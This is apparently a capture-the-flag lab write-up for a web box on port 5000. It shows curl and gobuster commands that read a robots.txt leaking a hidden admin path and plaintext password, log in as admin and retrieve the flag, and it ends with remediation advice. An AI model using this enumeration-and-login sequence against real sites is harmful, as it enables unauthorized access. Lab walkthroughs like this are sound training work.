Case file

robots.txt secret vault path and leaked admin password

Foundations web engagement: robots.txt disclosed /cupids_secret_vault/* and password cupid_arrow_2026!!!; admin login under that path returned the engagement artifact.

Foundations14 minWeb · Enumeration · Information Disclosure
  • Port 5000 app; robots.txt leaked Disallow path and a plaintext password; admin:cupid_arrow_2026!!! unlocked the vault.

  • Fetched robots.txt; used leaked password on vault admin panel.

01

Engagement summary

Port 5000 app; robots.txt leaked Disallow path and a plaintext password; admin:cupid_arrow_2026!!! unlocked the vault.

HIDDEN DEEP INTO MY HEART served a minimal site on TCP 5000. Directory enum surfaced robots.txt containing Disallow: /cupids_secret_vault/* and the string cupid_arrow_2026!!!. Enumerating under that prefix found an administrator login. Credentials admin / cupid_arrow_2026!!! authenticated and returned the protected content.

Business impact

robots.txt is not access control — it is a map for attackers. Never place passwords or admin paths in robots.txt. Protect admin with MFA and network restrictions; remove secrets from static discovery files.

02

robots.txt to admin login

Fetched robots.txt; used leaked password on vault admin panel.

OPERATOR · ENUM

savvy@lab:~$ curl -s http://10.10.10.50:5000/robots.txt

Disallow: /cupids_secret_vault/*

cupid_arrow_2026!!!

savvy@lab:~$ gobuster dir -u http://10.10.10.50:5000/cupids_secret_vault/ -w /usr/share/wordlists/dirb/common.txt

/admin (admin login)

savvy@lab:~$ curl -s -X POST http://10.10.10.50:5000/cupids_secret_vault/admin -d 'username=admin&password=cupid_arrow_2026!!!'

THM{l0v3_is_in_th3_r0b0ts_txt}

Remediation

Strip secrets from robots.txt; rate-limit and MFA admin; prefer not advertising admin paths publicly.